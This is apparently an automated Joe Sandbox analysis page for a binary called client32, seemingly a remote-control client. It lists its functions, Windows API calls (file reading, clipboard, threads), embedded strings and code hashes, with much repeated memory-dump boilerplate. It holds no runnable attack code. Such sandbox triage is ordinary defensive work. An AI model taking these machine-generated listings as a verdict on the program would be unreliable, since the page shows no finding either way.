Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 75fbc187aff8bd6701f5fdff7454b633672832933cc35328575910cd162d2c75
Instruction ID: 09cd33555f951a4db87b3258bd031d87f302a56b2b3b3639c3de48d9e4892ba0
Opcode Fuzzy Hash: 75fbc187aff8bd6701f5fdff7454b633672832933cc35328575910cd162d2c75
Instruction Fuzzy Hash: 62F0A73EF4056A76D61351667C49F8FB7584BC16BDF064031F914FA245EE11A44141F6

Function 110CF3C0 Relevance: 9.2, APIs: 6, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 110D6180: std::_Xinvalid_argument.LIBCPMT ref: 110D61A0
Part of subcall function 110D6180: _memmove.LIBCMT ref: 110D6227
Part of subcall function 110D6180: _memmove.LIBCMT ref: 110D624B

std::exception::exception.LIBCMT ref: 110CF436

Part of subcall function 1115E87A: std::exception::_Copy_str.LIBCMT ref: 1115E895

__CxxThrowException@8.LIBCMT ref: 110CF44B

Part of subcall function 1115ECD1: RaiseException.KERNEL32(?,?,1110D204,?,?,?,?,?,1110D204,?,111C7D3C), ref: 1115ED13

__strdup.LIBCMT ref: 110CF48C
_free.LIBCMT ref: 110CF58E

Part of subcall function 110CE2D0: __strdup.LIBCMT ref: 110CE2EA

std::exception::exception.LIBCMT ref: 110CF5B6
__CxxThrowException@8.LIBCMT ref: 110CF5CB

Part of subcall function 110D6180: _memmove.LIBCMT ref: 110D6285
Part of subcall function 110D6180: _memmove.LIBCMT ref: 110D62A1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$Exception@8Throw__strdupstd::exception::exception$Copy_strExceptionRaiseXinvalid_argument_freestd::_std::exception::_
String ID:
API String ID: 3555168555-0
Opcode ID: 5df668dcff40f4230500cf6e4f37bcc41b6353a526c4203cd6e3348b2a301cfd
Instruction ID: 75e7bf5810e08465b28565169f65d759fbc0e02b7024d7c42b2ed2c7efff3954
Opcode Fuzzy Hash: 5df668dcff40f4230500cf6e4f37bcc41b6353a526c4203cd6e3348b2a301cfd
Instruction Fuzzy Hash: E75192B5D0060AABD710CFA4D880B9EF7F9FF48714F1085A9E95693641E771B904CBA2

Function 11071060 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 430COMMON

Download Yara Rule

Strings

Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 11071400
Error %dz discarded %-4u bytes: %s, xrefs: 1107115C
%02x , xrefs: 1107113D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
API String ID: 0-2590468221
Opcode ID: 3de634a9a56cdccc5a0f1c51fe2ec3d6c1f9e05633e74bb02d9c146ab2921cec
Instruction ID: 7ee5740daa578c7ea64db7670d73d6d205fcd7c7721122ff2c828f62a5f8562a
Opcode Fuzzy Hash: 3de634a9a56cdccc5a0f1c51fe2ec3d6c1f9e05633e74bb02d9c146ab2921cec
Instruction Fuzzy Hash: 79E17179F10241DBDB18CF54CC90F6AB7AAEF89304F148269E9469F2C5DA30ED41CBA5

Function 11031380 Relevance: 9.2, APIs: 6, Instructions: 156fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C530: _malloc.LIBCMT ref: 1110C539
Part of subcall function 1110C530: _memset.LIBCMT ref: 1110C562

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 110313D4
GetFileSize.KERNEL32(00000000,00000000), ref: 110313F0
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 11031413
_memmove.LIBCMT ref: 11031467
CloseHandle.KERNEL32(?), ref: 110314A3
CloseHandle.KERNEL32(?), ref: 11031504

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateReadSize_malloc_memmove_memset
String ID:
API String ID: 2574518533-0
Opcode ID: 96efc46dd878d62add29deeee3a017a8f838ac94a0175d7f97ac4dede3d66e74
Instruction ID: 20c83cb89a8f3dfdafcf87935ea487d011ff864375340d28d3a39635b3eed337
Opcode Fuzzy Hash: 96efc46dd878d62add29deeee3a017a8f838ac94a0175d7f97ac4dede3d66e74
Instruction Fuzzy Hash: B2513EB5E01219AFCB40CFA8D880A9EFBF9FF48214F10852EE515E7241EB35A901CB91

Function 110315E0 Relevance: 9.1, APIs: 6, Instructions: 149windowclipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameA.USER32(?,?,00000080), ref: 1103166B
_memmove.LIBCMT ref: 110316F9
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11031769
TranslateMessage.USER32(?), ref: 11031777
DispatchMessageA.USER32(?), ref: 11031784
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1103179F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Peek$ClipboardDispatchFormatNameTranslate_memmove
String ID:
API String ID: 1130817274-0
Opcode ID: 85a4e6c82bcb2d6ae7dec9d43d60eb678a5b61b7fcde4ae20d994a096c1526b4
Instruction ID: 1dfb7777c81b65b16abcdb88ff15be91e91362f4c49535d720a3b26cef334e62
Opcode Fuzzy Hash: 85a4e6c82bcb2d6ae7dec9d43d60eb678a5b61b7fcde4ae20d994a096c1526b4
Instruction Fuzzy Hash: F9510971E102299BDB14DF64CC80BAAB7F9BF88304F55C1D9E589A7244DF71AA848FD0

Function 11061110 Relevance: 9.1, APIs: 6, Instructions: 97timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 11061126

Part of subcall function 11160387: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,1110EABA,?,00000000,00000001,00020001,?,?,currentver,?), ref: 11160392
Part of subcall function 11160387: __aulldiv.LIBCMT ref: 111603B2

__localtime64.LIBCMT ref: 1106112F

Part of subcall function 11162AE4: __localtime64_s.LIBCMT ref: 11162AF9

SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 110611B8
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 110611C2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 110611E3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 110611F1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__localtime64__localtime64_s__time64
String ID:
API String ID: 667980571-0
Opcode ID: df80a6758020a6d9ebc80622068a8265ef4a6ed28a6d0d801f932280e08259d2
Instruction ID: 823d6954ad38296087322b145d9a969938d4df0d56549f78e9fed80831f17a49
Opcode Fuzzy Hash: df80a6758020a6d9ebc80622068a8265ef4a6ed28a6d0d801f932280e08259d2
Instruction Fuzzy Hash: 91318E75D1021DAACF04DFE4D841AEFF7B8EF88314F00852EE815B7240EA74AA04CBA4

Function 11143450 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON

Download Yara Rule

APIs

OpenThread.KERNEL32(0000004A,00000000,111435B8,?,?,?,?,?,111435B8), ref: 1114347A
CreateThread.KERNEL32(00000000,00001000,111433F0,?,00000000,?), ref: 1114349E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,111435B8), ref: 111434A9
GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,111435B8), ref: 111434B4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,111435B8), ref: 111434C1
CloseHandle.KERNEL32(?,?,?,?,?,?,?,111435B8), ref: 111434C7

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
String ID:
API String ID: 180989782-0
Opcode ID: 35bc7324ee51bc60cafcc2917abd911b0f4d18a46627f359826ca99f15eabfb4
Instruction ID: 698e76658a8858e844582a1734dd707713600eb5990f6cb7de605b261aa04350
Opcode Fuzzy Hash: 35bc7324ee51bc60cafcc2917abd911b0f4d18a46627f359826ca99f15eabfb4
Instruction Fuzzy Hash: C801DE75D0422AAFDB01DF98CC45BEEBBB8EF48711F108165FA24E7284D7749A018BA5

Function 110333B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000146,00000000,00000000), ref: 11033403
SendMessageA.USER32(?,00000149,00000000,00000000), ref: 11033429
SendMessageA.USER32(?,00000148,00000000,?), ref: 1103344D
_strncmp.LIBCMT ref: 110334B2

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 110333E5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$_strncmp
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
API String ID: 3653864897-2723064302
Opcode ID: 3c4e3b58a313cc0d1aa2f407170ce38bcd6415a4c964c1b24f4ee8ee7ed6ed2a
Instruction ID: 76f31d2f94b433fc10b07d7c708796d5d8859651807f8bbcd75e6f449dc81e48
Opcode Fuzzy Hash: 3c4e3b58a313cc0d1aa2f407170ce38bcd6415a4c964c1b24f4ee8ee7ed6ed2a
Instruction Fuzzy Hash: 76412835D142595FC713CF788CC0BAABBE9AF8131AF1442D5E819DF390DA32AA488B40

Function 110630E0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 11063243

Strings

Processed EV_CALLED_CONTROL s=%d, addr=%s, xrefs: 11063223
Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s..., xrefs: 1106313A
CalledControl queuing connectCB, xrefs: 1106319E
CalledControl connectCB (ConnectToClient), xrefs: 11063163

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: CalledControl connectCB (ConnectToClient)$CalledControl queuing connectCB$Processed EV_CALLED_CONTROL s=%d, addr=%s$Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s...
API String ID: 269201875-3945191877
Opcode ID: 232fe5018e3b88a7b9d5a5810a6ccdfd40d9704753e8fd3a49fd9dc65f7f79ae
Instruction ID: 4b2164912f0538222172f0b8cbdb4ea5278ca4fc3bc90d53e304ce1cfd578385
Opcode Fuzzy Hash: 232fe5018e3b88a7b9d5a5810a6ccdfd40d9704753e8fd3a49fd9dc65f7f79ae
Instruction Fuzzy Hash: 9C4181B5A04A06AFE714CBA4DC44F56F7F8FF44718F10865AE86987680E774B804CBA1

Function 110330F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 11033104
_strncpy.LIBCMT ref: 11033144
wsprintfA.USER32 ref: 110331B2
_strncpy.LIBCMT ref: 1103320A

Strings

%s (%s), xrefs: 110331A9

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$wsprintf
String ID: %s (%s)
API String ID: 2895084632-1363028141
Opcode ID: 8c01f44c95c35ad33c70592a8b902e732d3d6d617fca3126146717692586948d
Instruction ID: df62fcfb66b42ca52bf19cbb8f01ce0b07d430d0dbac9de3c9af89919ab790cf
Opcode Fuzzy Hash: 8c01f44c95c35ad33c70592a8b902e732d3d6d617fca3126146717692586948d
Instruction Fuzzy Hash: 0631EE75A18346AFEB11DF24CC84BA7BBE8AF85319F004568ED458B391E7B4E404CBA1

Function 1113F4B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1113F4EB
_strrchr.LIBCMT ref: 1113F4FA
_strrchr.LIBCMT ref: 1113F50A
wsprintfA.USER32 ref: 1113F525

Part of subcall function 11141A40: GetModuleHandleA.KERNEL32(NSMTRACE,11190A88), ref: 11141A5A

Strings

CLIENT32, xrefs: 1113F520, 1113F52E, 1113F535, 1113F562

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Module_strrchr$FileHandleNamewsprintf
String ID: CLIENT32
API String ID: 2529650285-3575452709
Opcode ID: b924cd81c1bdc5e6a6c055efe2ad438fa040a7797eb38ce7078f4ebb4f9d482b
Instruction ID: fd944ba6039cb5a620a2b38b29ecf6f8ded3a0f851f3b8222ddf9bd191b5d83b
Opcode Fuzzy Hash: b924cd81c1bdc5e6a6c055efe2ad438fa040a7797eb38ce7078f4ebb4f9d482b
Instruction Fuzzy Hash: 46213834A0226B9BE712CFB48D447EAFBA5EF4231DF404098E9965B1C6EA705944C793

Function 1113F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F0CE
_memmove.LIBCMT ref: 1113F11D

Strings

Device, xrefs: 1113F0C4
Windows, xrefs: 1113F0C9
,,LPT1:, xrefs: 1113F0BF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
